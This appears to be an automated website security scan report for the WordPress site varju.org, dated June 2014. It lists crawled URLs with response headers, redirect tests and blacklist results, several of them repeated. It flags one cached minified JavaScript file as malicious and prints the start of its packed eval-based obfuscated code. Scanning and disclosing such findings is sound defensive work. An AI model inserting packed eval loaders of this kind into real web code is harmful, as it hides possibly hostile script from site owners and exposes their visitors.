Scanned pages/files
Request | Server response | Status |
http://varju.org/ | 200 OK Content-Length: 34257 Content-Type: text/html | clean |
https://varju.org/wp-content/cache/minify/000000/PYxRDsIgEEQvBKwtf95mCwSXAIssbWxPrzXVv5mXN_MYo90BMOHLROaYAzYS47h8GWRaBNJzDX2HyVgzX8UUqiaJukHbe-E69DaDuE5tCCwo5JS91H_QhWLHEc6tmsBh93ygtl4PjNplXv3v_QMc1g3ldN8.js | 200 OK Content-Length: 184285 Content-Type: application/javascript | clean |
http://varju.org//tracedseals.starfieldtech.com/siteseal/get?scriptId=cdSiteSeal2&cdSealType=Seal2&sealId=55e4ye7y7mb73fde99a5117e3567efe17jy7mb7355e4ye7ff4d3f93dc6cddf3a/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 23 Jun 2014 04:56:10 GMT Pragma: no-cache Location: http://varju.org/tracedseals.starfieldtech.com/siteseal/get?scriptId=cdSiteSeal2&cdSealType=Seal2&sealId=55e4ye7y7mb73fde99a5117e3567efe17jy7mb7355e4ye7ff4d3f93dc6cddf3a/ Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_2268690629=53a7b36aea225; expires=Mon, 23-Jun-2014 05:26:10 GMT; path=/; httponly X-CF-Powered-By: WP 1.3.14 X-Pingback: http://varju.org/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://varju.org/tracedseals.starfieldtech.com/siteseal/get?scriptid=cdsiteseal2&cdsealtype=seal2&sealid=55e4ye7y7mb73fde99a5117e3567efe17jy7mb7355e4ye7ff4d3f93dc6cddf3a/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 23 Jun 2014 04:56:11 GMT Pragma: no-cache Location: https://varju.org/tracedseals.starfieldtech.com/siteseal/get?scriptid=cdsiteseal2&cdsealtype=seal2&sealid=55e4ye7y7mb73fde99a5117e3567efe17jy7mb7355e4ye7ff4d3f93dc6cddf3a/ Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_2268690629=53a7b36b7fa35; expires=Mon, 23-Jun-2014 05:26:11 GMT; path=/; httponly X-CF-Powered-By: WP 1.3.14 X-Pingback: http://varju.org/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
https://varju.org/tracedseals.starfieldtech.com/siteseal/get?scriptid=cdsiteseal2&cdsealtype=seal2&sealid=55e4ye7y7mb73fde99a5117e3567efe17jy7mb7355e4ye7ff4d3f93dc6cddf3a/ | 404 Not Found Content-Length: 18712 Content-Type: text/html | clean |
https://varju.org//tracedseals.starfieldtech.com/siteseal/get?scriptId=cdSiteSeal2&cdSealType=Seal2&sealId=55e4ye7y7mb73fde99a5117e3567efe17jy7mb7355e4ye7ff4d3f93dc6cddf3a/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 23 Jun 2014 04:56:13 GMT Pragma: no-cache Location: https://varju.org/tracedseals.starfieldtech.com/siteseal/get?scriptId=cdSiteSeal2&cdSealType=Seal2&sealId=55e4ye7y7mb73fde99a5117e3567efe17jy7mb7355e4ye7ff4d3f93dc6cddf3a/ Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_3539719230=53a7b36da38e7; expires=Mon, 23-Jun-2014 05:26:13 GMT; path=/; httponly X-CF-Powered-By: WP 1.3.14 X-Pingback: https://varju.org/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://varju.org/test404page.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 23 Jun 2014 04:56:13 GMT Pragma: no-cache Location: https://varju.org/test404page.js Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_2268690629=53a7b36e58c3e; expires=Mon, 23-Jun-2014 05:26:14 GMT; path=/; httponly X-CF-Powered-By: WP 1.3.14 X-Pingback: http://varju.org/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
https://varju.org/test404page.js | 404 Not Found Content-Length: 18681 Content-Type: text/html | clean |
https://varju.org/wp-content/cache/minify/000000/ncvRCYAwDAXAhQylI4iTVBNMQBpJXlG31xn8uM-rJZ-OdpParscHEnQZlBozrQPwTtZJ2OBRcgs7kSV18ZCp_t3zgB_eWOIF.js | 200 OK Content-Length: 19350 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'([cfhlpquvzA-OQRT-Z]|[1-8]\\w)'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('c(!1u.2C){h 2C=l(){h p={4a:{"1v-G":"","6f-2a":1,"6g-2a-6h":K,"1G":v,"6i-6j":K,"1H-2D":4,"37":K,"1w":K,"4b":M,"6k-6l":K,"6m":M,"4c-1l":K,"1I-1f":M} Antivirus reports:
| ||
https://varju.org/ | 200 OK Content-Length: 34257 Content-Type: text/html | clean |
https://varju.org/nospm | 200 OK Content-Length: 20982 Content-Type: text/html | clean |
https://varju.org/wp-content/cache/minify/000000/M9FPzs_NTc0r0S1KLcip1MvNzAMA.js | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
https://varju.org/portfolio | 200 OK Content-Length: 22517 Content-Type: text/html | clean |
https://varju.org/wp-content/cache/minify/000000/M9RPzM4szk0t0Y_PzEvWT8svygUA.js | 200 OK Content-Length: 411 Content-Type: application/javascript | clean |
https://varju.org/priceless | 200 OK Content-Length: 22999 Content-Type: text/html | clean |
https://varju.org/skriptid | 200 OK Content-Length: 19806 Content-Type: text/html | clean |
https://varju.org/feed | 200 OK Content-Length: 29905 Content-Type: text/xml | clean |
https://varju.org//www.cloudflare.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 23 Jun 2014 04:56:22 GMT Pragma: no-cache Location: https://varju.org/www.cloudflare.com/ Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_3539719230=53a7b376dedca; expires=Mon, 23-Jun-2014 05:26:22 GMT; path=/; httponly X-CF-Powered-By: WP 1.3.14 X-Pingback: https://varju.org/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
https://varju.org/www.cloudflare.com/ | 404 Not Found Content-Length: 18712 Content-Type: text/html | clean |
https://varju.org/index.php?tag=desktop | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 23 Jun 2014 04:56:23 GMT Location: https://varju.org/kt_tag/desktop Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wfvt_3539719230=53a7b3787353f; expires=Mon, 23-Jun-2014 05:26:24 GMT; path=/; httponly X-CF-Powered-By: WP 1.3.14 X-Pingback: https://varju.org/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
https://varju.org/kt_tag/desktop | 200 OK Content-Length: 18961 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: varju.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 04:56:09 GMT
Accept-Ranges: bytes
ETag: "2a452135-85d1-4fc79561a4748"
Server: Apache/2
Vary: Accept-Encoding,Cookie,User-Agent
Content-Length: 34257
Content-Type: text/html; charset=UTF-8
Last-Modified: Mon, 23 Jun 2014 04:32:52 GMT
...34257 bytes of data.
GET / HTTP/1.1
Host: varju.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 04:56:09 GMT
Accept-Ranges: bytes
ETag: "2a452135-85d1-4fc79561a4748"
Server: Apache/2
Vary: Accept-Encoding,Cookie,User-Agent
Content-Length: 34257
Content-Type: text/html; charset=UTF-8
Last-Modified: Mon, 23 Jun 2014 04:32:52 GMT
...34257 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: varju.org
Referer: http://www.google.com/search?q=varju.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: varju.org
Referer: http://www.google.com/search?q=varju.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=varju.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://varju.org/
Result: varju.org is not infected or malware details are not published yet.
Result: varju.org is not infected or malware details are not published yet.